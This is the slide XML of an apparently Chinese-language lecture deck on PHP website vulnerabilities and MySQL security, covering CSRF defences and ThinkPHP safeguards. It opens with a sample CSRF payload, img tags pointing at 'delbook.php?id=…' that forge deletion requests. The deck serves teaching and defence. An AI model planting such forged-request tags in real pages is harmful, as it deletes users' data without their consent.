              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>delbook.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=4" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>delbook.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=5" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pP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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨网站伪造请求的防范</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要比防范其他攻击更加困难，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求虽然是攻击者伪造的，但是却是由目标用户发出的，一般常见的防范方法有下面几种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>检查网页的来源</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>检查内置的隐藏变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，不要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ThinkPHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的安全防范</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>输入过滤，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> I('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>post.xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>I('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>post.xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>filter('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Think\Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>类提供的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>insertFields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>updateFields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>属性、直接调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开启表单令牌，防止表单的重复提交</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保护模板文件，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目录下配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Think\Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对文件后缀、类型、大小的检测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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MH_Others_1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413579" y="3118999"/>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9" name="MH_Entry_1">
            <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089894" y="2673477"/>
            <a:ext cx="4688528" cy="445522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="72000" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" spc="200" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="200" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网站常见漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="200" dirty="0">
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="MH_Others_2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3890132" y="2740808"/>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7" name="MH_Number_1">
            <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413578" y="2637949"/>
            <a:ext cx="534424" cy="541829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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2800" b="1"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3" name="MH_Others_3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413579" y="4147987"/>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35" name="MH_Entry_2">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089894" y="3702465"/>
            <a:ext cx="4688528" cy="445522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="72000" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="MH_Others_4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3890132" y="3769796"/>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38" name="MH_Number_2">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413578" y="3666937"/>
            <a:ext cx="534424" cy="541829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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sz="2800" b="1"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4" name="MH_Others_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5322106" y="759729"/>
            <a:ext cx="1547788" cy="667006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF3B0D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目 录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="MH_Others_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4249284" y="1402227"/>
            <a:ext cx="3693432" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DDDDDD"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CONTENTS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" spc="400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库安全性问题一直是围绕着数据库管理员的恶梦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库数据的丢失以及数据库被非法用户的侵入等等问题都会让数据库管理员身心疲惫不堪。今天我们就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据安全方面做一些探究。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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MH_Others_1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413579" y="3118999"/>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9" name="MH_Entry_1">
            <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089894" y="2673477"/>
            <a:ext cx="4688528" cy="445522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="72000" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" spc="200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网站常见漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" spc="200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="MH_Others_2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3890132" y="2740808"/>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7" name="MH_Number_1">
            <a:hlinkClick r:id="rId13" action="ppaction://hlinksldjump"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413578" y="2637949"/>
            <a:ext cx="534424" cy="541829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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2800" b="1"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3" name="MH_Others_3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413579" y="4147987"/>
            <a:ext cx="5364843" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FFBBAB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
